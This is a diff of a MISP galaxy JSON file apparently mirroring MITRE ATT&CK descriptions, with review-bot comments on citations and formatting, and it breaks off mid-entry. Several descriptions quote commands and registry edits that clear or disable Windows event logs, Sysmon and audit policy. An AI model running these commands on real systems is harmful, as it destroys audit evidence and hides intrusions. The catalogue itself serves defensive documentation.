"https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf",
"https://docs.microsoft.com/windows-server/administration/windows-commands/klist",
"https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285",
@@ -3185,7 +3210,7 @@
"value": "OS-vendor provided communication channels - T1390"
},
{
- "description": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.\n\nAdversaries in possession credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.\n\nIn some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)",
+ "description": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.\n\nAdversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.\n\nIn some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)",
"meta": {
"external_id": "T1621",
"kill_chain": [
@@ -3248,7 +3273,7 @@
"value": "Rogue Wi-Fi Access Points - T1465"
},
{
- "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nThe event logs can be cleared with the following utility commands:\n\n* wevtutil cl system
\n* wevtutil cl application
\n* wevtutil cl security
\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nThe event logs can be cleared with the following utility commands:\n\n* wevtutil cl system
\n* wevtutil cl application
\n* wevtutil cl security
\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command Remove-EventLog -LogName Security
to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)",
"meta": {
"external_id": "T1070.001",
"kill_chain": [
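Review bot: the added Remove-EventLog example introduces the citation key disable_win_evt_logging, which this patch also introduces in the T1562.001 and T1562.002 descriptions below. All three entries therefore need the matching ptylu.github.io ref in their refs list; it is present in the next hunk for T1070.001 and in the T1562.001 refs hunk, but the T1562.002 hunk is cut off before its refs list, so please confirm that one as well.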
@@ -3266,7 +3291,8 @@
"https://attack.mitre.org/techniques/T1070/001",
"https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog",
"https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil",
- "https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx"
+ "https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx",
+ "https://ptylu.github.io/content/report/report.html?report=25"
]
},
"related": [
@@ -3570,7 +3596,7 @@
"value": "Extra Window Memory Injection - T1055.011"
},
{
- "description": "Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)\n\nCreating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).",
+ "description": "Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)\n\nCreating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.\n\nWhile this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.",
"meta": {
"external_id": "T1134.002",
"kill_chain": [
@@ -3649,7 +3675,7 @@
"value": "System Runtime API Hijacking - T1625.001"
},
{
- "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. 
[Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
+ "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) \n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational
may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
"meta": {
"external_id": "T1562.001",
"kill_chain": [
@@ -3673,9 +3699,9 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1562/001",
- "https://capec.mitre.org/data/definitions/578.html",
"https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf",
"https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/",
+ "https://ptylu.github.io/content/report/report.html?report=25",
"https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947",
"https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html",
"https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/",
@@ -3724,7 +3750,7 @@
"value": "Compromise Software Supply Chain - T1195.002"
},
{
- "description": "Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the LogonUser
function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken
to assign the token to a thread.",
+ "description": "Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.\n\nThis behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.",
"meta": {
"external_id": "T1134.003",
"kill_chain": [
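Review bot: the rewritten T1134.003 description marks `LogonUser` and `SetThreadToken` with Markdown backticks, whereas the removed line and the neighbouring T1134.002 entry (CreateProcessWithTokenW, runas) use the inline-code markup that the rest of the file uses. If descriptions are generated from upstream, check that the generator did not change how it renders inline code between runs; if this was hand-edited, match the surrounding convention so consumers rendering the galaxy get one style.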
@@ -3799,7 +3825,6 @@
"refs": [
"http://msdn.microsoft.com/en-us/library/bb166549.aspx",
"https://attack.mitre.org/techniques/T1546/001",
- "https://capec.mitre.org/data/definitions/556.html",
"https://docs.microsoft.com/windows-server/administration/windows-commands/assoc",
"https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs",
"https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd"
@@ -3867,7 +3892,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1574/001",
- "https://capec.mitre.org/data/definitions/471.html",
"https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637",
"https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN",
"https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN",
@@ -3906,8 +3930,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1574/010",
- "https://capec.mitre.org/data/definitions/17.html"
+ "https://attack.mitre.org/techniques/T1574/010"
]
},
"related": [
@@ -3979,7 +4002,7 @@
"value": "Network Address Translation Traversal - T1599.001"
},
{
- "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy
for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration
for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe
may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog
.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol
and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success
or /failure
parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable
turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y
or auditpol /remove /allusers
.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.",
+ "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy
for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration
for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe
may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped
or sc config eventlog start=disabled
commands (followed by manually stopping the service using Stop-Service -Name EventLog
).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog
then restarting the system for the change to take effect.(Citation: disable_win_evt_logging)\n\nThere are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the \"Start\" value in the key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security
, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System
and HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application
to disable the entire EventLog.(Citation: disable_win_evt_logging)\n\nAdditionally, adversaries may use auditpol
and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success
or /failure
parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable
turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y
or auditpol /remove /allusers
.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.",
"meta": {
"external_id": "T1562.002",
"kill_chain": [
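Review bot: the auditpol example kept in the new string ('auditpol /set /category:”Account Logon” /success:disable /failure:disable') still uses curly quotes, which cmd.exe does not treat as argument quoting; since this hunk already rewrites the description, replace them with straight quotes (escaped as \" in the JSON). Two new citation keys are introduced here ('disable_win_evt_logging' and 'winser19_file_overwrite_bug_twitter'); the second is the only support for the statement that the 'Start' value under ...\WMI\Autologger\EventLog-Security can be changed without Administrator privileges, so that sentence deserves a caveat or a second source.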
@@ -4003,8 +4026,10 @@
"https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings",
"https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md",
+ "https://ptylu.github.io/content/report/report.html?report=25",
"https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html",
"https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c",
+ "https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040",
"https://www.coretechnologies.com/blog/windows-services/eventlog/",
"https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/",
"https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/"
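Review bot: the two added refs are a personal report page ('ptylu.github.io/...?report=25') and a web.archive.org copy of a tweet; both back new claims in the description above, and an archived tweet is a fragile reference for a cluster file that downstream tooling imports. If a vendor write-up or Microsoft documentation covers the same registry-based EventLog disablement, add it next to these. Ordering is fine: both entries are placed in the list's existing alphabetical order.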
@@ -4038,7 +4063,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1562/003",
- "https://capec.mitre.org/data/definitions/13.html",
"https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit",
"https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics",
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7"
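Review bot: this hunk, and the later ones for T1574.011, T1016, T1027, T1083, T1499 and T1021.002, remove every capec.mitre.org reference without any accompanying change. If this mirrors the upstream mitre/cti export, the commit message should say so; if it does not, it silently drops the CAPEC-to-ATT&CK mapping that some consumers of this galaxy rely on. Either way the removal should be stated explicitly rather than buried among wording fixes.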
@@ -4565,7 +4589,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1574/011",
- "https://capec.mitre.org/data/definitions/478.html",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
"https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree",
"https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN",
@@ -4619,7 +4642,7 @@
"value": "Component Object Model Hijacking - T1546.015"
},
{
- "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b
command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)",
+ "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b
command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)",
"meta": {
"external_id": "T1140",
"kill_chain": [
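Review bot: the space before '(Citation: ...)' is removed for the Malwarebytes and Carbon Black citations but left in place for '(Citation: Volexity PowerDuke November 2016)' at the end of the same string; make all three consistent while the line is being touched.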
@@ -4712,7 +4735,7 @@
"value": "Data Transfer Size Limits - T1030"
},
{
- "description": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n",
+ "description": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n",
"meta": {
"external_id": "T1005",
"kill_chain": [
@@ -4733,6 +4756,7 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1005",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_protocols_through_showmon.html#wp2760878733",
"https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits",
"https://www.us-cert.gov/ncas/alerts/TA18-106A"
]
@@ -4815,7 +4839,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1016",
- "https://capec.mitre.org/data/definitions/309.html",
"https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits",
"https://www.us-cert.gov/ncas/alerts/TA18-106A"
]
@@ -4996,7 +5019,7 @@
"value": "Data from Configuration Repository - T1602"
},
{
- "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ",
+ "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ",
"meta": {
"external_id": "T1027",
"kill_chain": [
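Review bot: the new sentence links [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010); nothing in this diff shows a T1027.010 cluster being added or a subtechnique-of entry in the 'related' list for T1027, so check that both exist, otherwise the link points at a technique this file does not know. The trailing spaces inside the string ('defenses. \n\n', 'JavaScript. \n\n', and at the very end) are carried over unchanged; trim them since the line is rewritten anyway.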
@@ -5008,7 +5031,10 @@
"File: File Metadata",
"Module: Module Load",
"Process: OS API Execution",
- "Process: Process Creation"
+ "Process: Process Creation",
+ "Script: Script Execution",
+ "WMI: WMI Creation",
+ "Windows Registry: Windows Registry Key Creation"
],
"mitre_platforms": [
"Linux",
@@ -5017,12 +5043,11 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1027",
- "https://capec.mitre.org/data/definitions/267.html",
"https://github.com/danielbohannon/Revoke-Obfuscation",
"https://github.com/itsreallynick/office-crackros",
"https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/",
+ "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
"https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/",
- "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
"https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf",
"https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/",
"https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/"
@@ -5177,8 +5202,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1083",
"https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html",
- "https://capec.mitre.org/data/definitions/127.html",
- "https://capec.mitre.org/data/definitions/497.html",
"https://www.us-cert.gov/ncas/alerts/TA18-106A"
]
},
@@ -5340,13 +5363,15 @@
"value": "Obtain Device Cloud Backups - T1470"
},
{
- "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl
may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) ",
+ "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl
may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)\n\nMany IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).",
"meta": {
"external_id": "T1048",
"kill_chain": [
"mitre-attack:exfiltration"
],
"mitre_data_sources": [
+ "Application Log: Application Log Content",
+ "Cloud Storage: Cloud Storage Access",
"Command: Command Execution",
"File: File Access",
"Network Traffic: Network Connection Creation",
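Review bot: the new closing paragraph naming Microsoft Exchange, SharePoint, GitHub and AWS S3 is the only uncited claim in the description; add a '(Citation: ...)' for it, otherwise the refs list for T1048 stays as it was while the text grows. Note also that the removed sentence 'Different protocol channels could also include Web services such as cloud storage.' is not really replaced: the new paragraph is about downloading data through a console or Cloud API, not about cloud storage as an alternate channel, so the cloud-storage case is now only implied by the added 'Cloud Storage: Cloud Storage Access' data source.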
@@ -5356,7 +5381,12 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Office 365",
+ "SaaS",
+ "IaaS",
+ "Google Workspace",
+ "Network"
],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/",
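Review bot: 'Network' is added to mitre_platforms, but nothing in the rewritten description (curl on macOS/Linux, Net/SMB, FTP, SaaS/IaaS consoles and the Cloud API) mentions network devices; either the description should say how exfiltration over an alternative protocol applies to them or the platform should not be added here. The cloud platforms match the new last paragraph, so those are fine.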
@@ -5481,7 +5511,11 @@
"Linux",
"macOS",
"Windows",
- "Network"
+ "Network",
+ "Office 365",
+ "Azure AD",
+ "IaaS",
+ "Google Workspace"
],
"refs": [
"https://attack.mitre.org/techniques/T1059",
@@ -5805,7 +5839,7 @@
"value": "Kernel Modules and Extensions - T1215"
},
{
- "description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build
